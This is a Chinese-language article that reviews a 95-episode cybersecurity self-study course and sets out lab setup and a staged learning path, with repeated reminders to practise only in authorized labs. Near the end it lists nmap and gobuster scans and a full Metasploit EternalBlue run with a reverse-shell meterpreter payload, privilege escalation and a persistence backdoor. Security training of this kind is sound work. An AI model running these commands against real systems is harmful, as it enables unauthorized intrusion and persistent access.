
这次我们来看一套完整的网络安全自学教程。这套由北大大佬带队制作的95集课程号称是B站最全最细的网络安全系统精讲目标是让学习者少走99%的弯路。对于想从零入门网络安全、了解黑客技术体系或者希望系统化提升技能的人来说这是一个值得关注的资源。这套教程的核心价值在于其系统性。它不像零散的技巧分享而是构建了一个从基础到实战的完整学习路径。课程内容覆盖了网络安全的基础概念、常见漏洞原理、渗透测试方法、代码审计、安全工具使用等多个维度。对于初学者最大的痛点往往是“不知道学什么”和“学的知识不成体系”这套教程试图解决的就是这个问题。本文将带你全面拆解这套教程可能涵盖的内容体系、适合的学习者、以及如何最高效地利用它进行自学。我们不会空谈概念而是聚焦于实操从环境搭建、工具准备到每个学习阶段的核心任务与验证方法最后给出持续进阶的路线图。无论你是计算机相关专业的学生还是希望转行安全的IT从业者都能从中找到清晰的行动指南。1. 核心能力速览教程内容体系在深入细节之前我们先通过一个表格快速了解这套教程可能构建的能力体系。这有助于你判断它是否匹配你的学习目标。能力项说明与可能涵盖内容知识体系构建从网络基础、系统安全、Web安全到移动安全、云安全的完整知识框架。实战技能渗透测试流程、漏洞扫描与利用、代码审计、内网渗透、应急响应等实战能力。工具掌握Kali Linux、Metasploit、Burp Suite、Nmap、Wireshark等主流安全工具的使用与原理。靶场实践利用DVWA、Vulnhub、HackTheBox等靶场进行模拟实战巩固理论知识。学习路径提供从零基础到中阶的清晰学习路线减少自学过程中的迷茫和试错。思维培养培养黑客安全研究员的攻防思维、漏洞挖掘思路和问题解决能力。合规边界强调学习与实践的合法合规性所有操作应在授权环境或自有实验环境中进行。这套教程的价值在于将分散的知识点串联成线再编织成网。对于自学者而言拥有这样一张“地图”至关重要。2. 适用人群与学习边界在开始学习之前明确自己是否适合以及学习的边界在哪里可以避免后续走偏。这套教程最适合以下人群网络安全零基础初学者对黑客、安全感兴趣但不知从何入手需要一套系统的入门指引。计算机相关专业学生希望将课堂理论与安全实践结合提升就业竞争力。IT运维/开发人员希望了解安全知识提升所负责系统或代码的安全性向安全岗位转型。希望构建知识体系的安全爱好者已经通过碎片化文章学习了一些技巧但感觉知识杂乱需要系统化梳理。学习前必须明确的边界安全与合规底线绝对禁止未经授权的测试所有学到的技术仅限在你自己拥有完全控制权的环境如本地虚拟机、自己购买的云服务器或明确获得授权的靶场如HackTheBox、DVWA中进行练习。对任何未授权的系统进行扫描、探测、攻击都是违法行为。工具不是“黑客武器”Kali Linux、Metasploit等是安全专业人员的测试工具其目的是为了发现和修复漏洞而非进行破坏。务必树立正确的安全观。关注防御而非单纯攻击教程中可能会讲解大量攻击手法但学习的终极目的是理解攻击原理从而更好地进行防御。要思考“如果我是管理员如何防范这种攻击”。法律风险意识即使是在测试环境中也应避免保存、传播任何与真实漏洞利用相关的敏感数据或工具。你的学习行为不应给他人带来任何潜在风险。明确这些边界是你安全、长久地在这条路上走下去的前提。3. 学习环境准备与搭建工欲善其事必先利其器。网络安全学习需要一个隔离、可控的实验环境。以下是搭建个人安全实验室的通用方案。3.1 硬件与基础软件准备操作系统主力机推荐使用Windows 10/11或macOS。学习过程中需要大量使用虚拟机。虚拟机软件VMware Workstation Pro功能强大或VirtualBox免费开源。这是搭建靶机和安全工具平台的基石。内存建议主机内存不低于16GB。因为通常需要同时运行攻击机如Kali Linux和多个靶机如Windows靶机、漏洞平台。磁盘空间预留至少100GB的磁盘空间用于存放虚拟机镜像、工具包和实验数据。网络确保主机可以访问互联网以下载工具和靶场资源。学习内网渗透时需要配置虚拟机的复杂网络模式如NAT、仅主机模式。3.2 核心平台安装Kali LinuxKali Linux是渗透测试和安全审计最流行的Linux发行版集成了数百种安全工具。安装步骤下载镜像访问 Kali Linux 官网下载适用于VMware或VirtualBox的预构建虚拟机镜像.ova或.vmx格式。这是最快的方式无需从头安装。导入虚拟机打开VMware选择“文件”-“打开”找到下载的.ova或.vmx文件。在VirtualBox中选择“管理”-“导入虚拟电脑”选择.ova文件。配置虚拟机内存分配给Kali虚拟机至少4GB8GB更佳。处理器分配2个以上CPU核心。网络适配器初期选择“NAT模式”让虚拟机可以上网。后续学习桥接、仅主机模式等。启动与登录默认用户名kali密码kali。首次启动后建议在终端执行sudo apt update sudo apt upgrade -y更新系统。3.3 靶机环境搭建没有靶子就无法练习射击。你需要搭建漏洞环境来模拟真实目标。推荐靶场平台DVWADamn Vulnerable Web Application一个专门用于安全脆弱性学习的PHP/MySQL Web应用。极易在本地搭建。快速搭建可以使用XAMPP或PHPStudy这类集成环境将DVWA源码放入Web目录按提示配置数据库即可。Vulnhub提供大量已制作好的虚拟机靶机镜像.ova格式涵盖从易到难的各种漏洞场景。下载后直接导入虚拟机即可。Metasploitable一个故意设计存在大量漏洞的Linux靶机非常适合练习Metasploit框架。在线靶场如HackTheBox、TryHackMe、PentesterLab等。无需本地搭建通过浏览器访问即可进行挑战。这是从本地环境向真实网络环境过渡的绝佳平台。建议初期环境组合攻击机Kali Linux 虚拟机1台。靶机1DVWA运行在主机或另一台Linux虚拟机中。靶机2Vulnhub上的入门级靶机如“Mr Robot”。 这样你就可以在一个封闭的虚拟网络里安全地进行攻防演练了。4. 教程核心模块拆解与学习路线根据标题和常见网络安全体系我们可以推断这套95集的教程很可能按以下模块展开。你可以按此路线图结合视频进行学习。4.1 第一阶段网络安全基础与法律法规预计1-15集这是大厦的地基枯燥但必须牢固。学习目标理解网络、系统、Web的基本工作原理建立法律与道德红线意识。核心内容计算机网络基础TCP/IP模型、HTTP/HTTPS、DNS、ARP等。操作系统基础Linux常用命令、Windows系统结构。编程语言基础至少了解Python、PHP、JavaScript的语法能看懂简单代码。网络安全法律法规、职业道德与黑客发展史。验证方法能用自己的话解释常见网络协议交互过程能在Linux中完成文件操作、进程管理、网络配置能编写简单的Python脚本实现端口扫描雏形。4.2 第二阶段信息收集与漏洞扫描预计16-30集“知己知彼百战不殆”。信息收集是渗透测试的第一步。学习目标掌握主动/被动信息收集方法学会使用扫描器发现目标资产和潜在漏洞。核心内容与工具信息收集Whois查询、子域名枚举、目录扫描、搜索引擎黑客技术Google Hacking。主机发现与端口扫描Nmap参数详解SYN扫描、ACK扫描、版本探测等。漏洞扫描Nessus、OpenVAS的基本使用与报告解读。实战验证对本地搭建的Metasploitable靶机进行全端口扫描识别开放的服务。使用Nmap的NSE脚本探测靶机服务的详细信息。尝试通过搜索引擎找到某个测试网站的敏感目录或文件。4.3 第三阶段Web安全核心漏洞预计31-50集Web是主战场这部分是重中之重。学习目标深入理解OWASP Top 10漏洞的原理、利用方式与防御方法。核心漏洞SQL注入联合查询注入、报错注入、布尔盲注、时间盲注。工具Sqlmap。XSS反射型、存储型、DOM型XSS。利用与绕过。文件上传绕过前端验证、MIME类型、文件头、解析漏洞。文件包含本地文件包含、远程文件包含。命令执行代码执行与命令执行漏洞。CSRF、SSRF、XXE原理与利用场景。工具精讲Burp SuiteProxy、Repeater、Intruder、Scanner模块的深度使用。实战验证在DVWA靶场中将安全级别设为“Low”针对每一种漏洞类型手动构造Payload进行利用并尝试在“Medium”和“High”级别下进行绕过。4.4 第四阶段系统提权与内网渗透预计51-70集突破边界后如何扩大战果。学习目标掌握Linux/Windows系统提权方法理解内网横向移动的基本思路。核心内容提权枚举使用LinPEAS、WinPEAS等脚本自动化收集系统信息寻找提权线索。内核漏洞提权识别系统版本查找并利用公开的本地提权EXP。配置错误提权SUID/GUID文件、计划任务、服务权限、密码复用等。内网基础工作组/域环境概念、ARP欺骗、LLMNR/NBT-NS投毒。横向移动PTHPass-the-Hash、PTTPass-the-Ticket、票据传递。实战验证在Vulnhub找一个需要提权的靶机如“Kioptrix”系列完成从Web入侵到获取系统Root/System权限的全过程。4.5 第五阶段渗透测试框架与后渗透预计71-85集学习使用“自动化武器库”和维持访问。学习目标熟练使用Metasploit进行漏洞利用了解后渗透阶段的基本操作。核心工具Metasploit Framework。核心内容Metasploit基本命令search,use,set,exploit,sessions。利用MSF模块对已知漏洞进行攻击如EternalBlue。生成各类Payload反向Shell、Meterpreter并进行免杀初步尝试。Meterpreter会话的基本操作文件系统操作、权限提升、信息收集、跳板攻击。持久化后门植入服务、注册表、计划任务。实战验证使用Metasploit攻击Metasploitable靶机上的漏洞服务如vsftpd成功获取Meterpreter会话并尝试进行简单的内网嗅探或权限提升。4.6 第六阶段综合实战与知识拓展预计86-95集融会贯通并接触前沿领域。学习目标整合前面所学完成一个相对复杂的渗透测试流程了解安全其他领域。核心内容综合靶场实战挑战一个中等难度的Vulnhub或HackTheBox靶机撰写简单的渗透测试报告。代码审计入门学习PHP/Java代码审计的基本方法能从源码层面发现漏洞。安全工具开发用Python编写一个简单的漏洞扫描或爆破脚本。拓展领域移动安全、无线安全、云安全、社会工程学的简要介绍。终极验证独立完成一个从信息收集到获取最终权限的完整渗透测试过程并记录详细步骤。5. 高效自学方法与实践验证有了教程和路线图如何高效学习并确保真正掌握5.1 “看-练-记-讲”四步学习法看集中精力观看视频理解漏洞原理和工具操作逻辑。遇到不懂的术语暂停并立即搜索。练这是最关键的一步。视频中的每一步操作必须在自己的实验环境中亲手重现。不要复制粘贴命令要自己敲理解每个参数的意义。尝试改变参数观察不同结果。记使用笔记软件如Obsidian、Notion或写技术博客。记录漏洞原理用自己的话总结。利用过程分步骤附截图和命令。遇到的错误及解决方法。防御方案。 这份笔记将成为你个人的知识库。讲尝试将学到的知识点讲给别人听或者自己模拟讲解。费曼技巧是检验是否真正理解的最佳方式。5.2 分阶段实战验证清单每学完一个阶段用下面的清单检验自己的学习成果阶段二信息收集结束后你应该能# 使用Nmap对目标进行隐蔽扫描和版本探测 nmap -sS -sV -T4 [靶机IP] # 使用dirb或gobuster进行目录爆破 gobuster dir -u http://[靶机IP] -w /usr/share/wordlists/dirb/common.txt阶段三Web安全结束后你应该能手动构造一个联合查询的SQL注入Payload从数据库中获取管理员账号密码。利用Burp Suite抓取登录请求并成功进行暴力破解。上传一个图片马并利用文件包含或解析漏洞获得WebShell。阶段四提权结束后你应该能在Linux靶机上找到一个具有SUID权限的可执行文件并利用它提权到root。在Windows靶机上通过系统信息收集发现未修复的内核漏洞并利用公开EXP提权。阶段五Metasploit结束后你应该能# 独立完成一次完整的MSF攻击流程 msfconsole search eternalblue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS [靶机IP] set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [你的Kali IP] exploit # 进入meterpreter后获取系统权限并创建持久化后门 getsystem run persistence -X -i 60 -p 443 -r [你的Kali IP]6. 常见问题与排查指南自学过程中你一定会遇到各种问题。这里列出一些典型问题及解决思路。问题现象可能原因排查与解决思路虚拟机无法上网虚拟机网络配置错误主机防火墙或安全软件拦截。1. 检查虚拟机网络适配器模式NAT模式最易用。2. 在Kali中执行ping 8.8.8.8测试连通性。3. 检查主机防火墙设置暂时关闭或添加规则。工具命令找不到工具未安装环境变量未配置。1. 使用which [工具名]检查是否安装。2. Kali中大部分工具已预装未安装的使用sudo apt install [工具名]。3. 确认是否在正确的目录下执行命令。漏洞利用不成功靶机环境不对Payload不匹配网络不通防护开启。1.核对环境确认靶机IP、服务端口、漏洞版本与教程一致。2.检查PayloadLHOST、LPORT、目标系统架构x86/x64是否设置正确。3.关闭防护确保靶机如Windows的防火墙、杀毒软件已关闭。4.查看错误信息仔细阅读工具返回的错误信息搜索引擎是你的好朋友。Burp Suite抓不到包浏览器代理未设置证书问题Burp监听端口错误。1. 浏览器代理设置为127.0.0.1:8080。2. 访问http://burp下载并安装Burp的CA证书到浏览器。3. 确认Burp的Proxy监听端口是否为8080。SQL注入无回显可能是盲注。尝试布尔盲注(and 11/and 12)或时间盲注(sleep(5))使用Sqlmap的--level和--risk参数提高检测等级。提权脚本运行失败靶机缺少依赖脚本与系统不兼容权限不足。1. 查看脚本错误提示安装缺失的依赖库如gcc, python-dev。2. 尝试寻找针对当前系统版本的替代提权EXP。3. 检查脚本是否具有可执行权限 (chmod x)。最重要的排查原则看日志/报错任何工具或服务的错误信息都包含了最重要的线索。简化复现尝试在最简单、最干净的环境下复现问题排除其他干扰。分段测试将一个复杂的攻击链拆分成多个小步骤逐一验证每一步是否成功。善用搜索将错误信息直接复制到搜索引擎如Google、Bing大概率能找到解决方案。7. 从学习到实践下一步进阶路线完成这套95集的教程你只是走出了万里长征的第一步。接下来你需要通过持续的实践和拓展来真正成长为一名合格的安全从业人员。深耕靶场HackTheBox注册账号从“Starting Point”和“Easy”难度的机器开始挑战。它的环境更接近真实世界。TryHackMe学习路径更友好房间Room设计有完整的引导和教学适合巩固知识。攻防竞赛关注CTFCapture The Flag比赛如国内的“强网杯”、XCTF联赛等。从Web、Crypto、Misc等分类的简单题目做起。学习开发Python必须熟练掌握。用于编写自动化脚本、漏洞利用工具、扫描器。Go近年来安全工具开发的热门语言性能好适合编写高并发扫描器、C2框架。前端基础了解HTML、JavaScript有助于深入理解XSS、CSRF等漏洞。关注前沿订阅安全媒体关注安全客、FreeBuf、Seebug、先知社区等了解最新漏洞和行业动态。阅读漏洞报告在CVE Details、Exploit-DB上阅读公开的漏洞详情和利用代码学习分析思路。参与开源项目尝试为一些知名的安全工具如Nmap脚本、Burp插件提交Issue或PR甚至开发自己的小工具。构建知识体系阅读经典书籍《白帽子讲Web安全》《Web安全深度剖析》《内网安全攻防》等。考取认证如果计划求职可以考虑OSCP实战性强、CISP国内认可等认证系统化梳理知识并证明能力。网络安全是一个需要终身学习的领域。这套95集的教程为你打开了一扇门门后是一个充满挑战与机遇的世界。记住合法性、道德心和持续的好奇心是你在这个领域立足的根本。现在启动你的虚拟机开始第一次信息收集吧。